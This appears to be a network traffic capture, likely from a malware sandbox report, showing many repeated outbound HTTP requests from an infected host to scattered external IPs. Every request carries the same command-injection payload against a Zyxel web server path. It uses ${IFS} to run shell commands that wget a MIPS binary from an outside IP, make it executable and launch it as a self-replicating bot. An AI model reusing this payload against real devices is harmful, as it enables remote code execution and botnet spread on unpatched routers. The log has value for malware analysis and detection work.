                                                        Feb 2, 2024 06:20:58.696053982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1523192.168.2.145114654.70.48.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696067095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1524192.168.2.1440926140.149.141.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696105003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1525192.168.2.1458442164.24.29.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696141005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1526192.168.2.144639661.42.58.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696192026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1527192.168.2.1453752191.127.52.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696227074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1528192.168.2.143551423.101.147.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696276903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1529192.168.2.1458854183.96.46.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696311951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1530192.168.2.144864014.125.63.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696371078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1531192.168.2.14458109.252.168.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696402073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1532192.168.2.1437320183.55.225.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696449995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1533192.168.2.1453482206.157.104.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696486950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1534192.168.2.143367886.10.9.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696523905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1535192.168.2.1456566219.239.225.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696558952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1536192.168.2.1444034123.45.59.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696590900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1537192.168.2.145269639.182.32.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696614981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1538192.168.2.144462041.216.106.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696666956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1539192.168.2.143895431.113.50.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696708918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1540192.168.2.1458494131.205.58.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696748018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1541192.168.2.1440732188.216.188.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696791887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1542192.168.2.145867235.167.146.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696841002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1543192.168.2.145554860.214.50.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696877956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1544192.168.2.145242074.219.126.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696922064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1545192.168.2.1458756207.177.37.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.696974039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1546192.168.2.1436260140.54.111.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697014093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1547192.168.2.1452088167.154.200.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697057009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1548192.168.2.143986659.95.166.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697093964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1549192.168.2.1443716125.190.175.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697129965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1550192.168.2.144887620.124.31.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697175980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1551192.168.2.144610817.31.103.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697205067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1552192.168.2.144873248.150.42.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697243929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1553192.168.2.144009634.178.251.233443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697294950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1554192.168.2.145889042.92.220.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697319984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1555192.168.2.1451602195.247.34.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697354078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1556192.168.2.1443644216.113.163.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697406054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1557192.168.2.145382278.166.9.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697449923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1558192.168.2.1443358124.66.104.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697494030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1559192.168.2.145934840.113.171.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697534084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1560192.168.2.1457042115.249.252.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697568893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1561192.168.2.1460642169.61.71.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697593927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1562192.168.2.1450648153.221.16.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697639942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1563192.168.2.145685689.175.171.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697678089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1564192.168.2.1438998134.149.163.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697727919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1565192.168.2.144341299.240.124.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697774887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1566192.168.2.1456328188.135.190.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697819948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1567192.168.2.143410853.85.164.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697851896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1568192.168.2.1432924106.108.98.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697877884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1569192.168.2.145762663.226.249.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697911978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1570192.168.2.1444484164.174.209.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697967052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1571192.168.2.1447358207.163.16.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.697997093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1572192.168.2.1447868101.243.65.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698034048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1573192.168.2.1446700156.225.203.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698062897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1574192.168.2.1438510176.73.147.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698117971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1575192.168.2.1452466223.3.172.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698153019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1576192.168.2.144685658.196.115.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698184013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1577192.168.2.1440234165.156.68.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698215961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1578192.168.2.1458356158.7.177.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698282957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1579192.168.2.144681817.107.34.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698322058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1580192.168.2.1451940152.70.234.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698367119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1581192.168.2.1453250129.48.107.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698415041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1582192.168.2.1459486172.195.236.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698452950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1583192.168.2.1443688139.19.178.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698493004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1584192.168.2.1452276162.30.60.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698542118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1585192.168.2.1452682175.161.169.220443
                                                        TimestampBytes transferredDirectionData
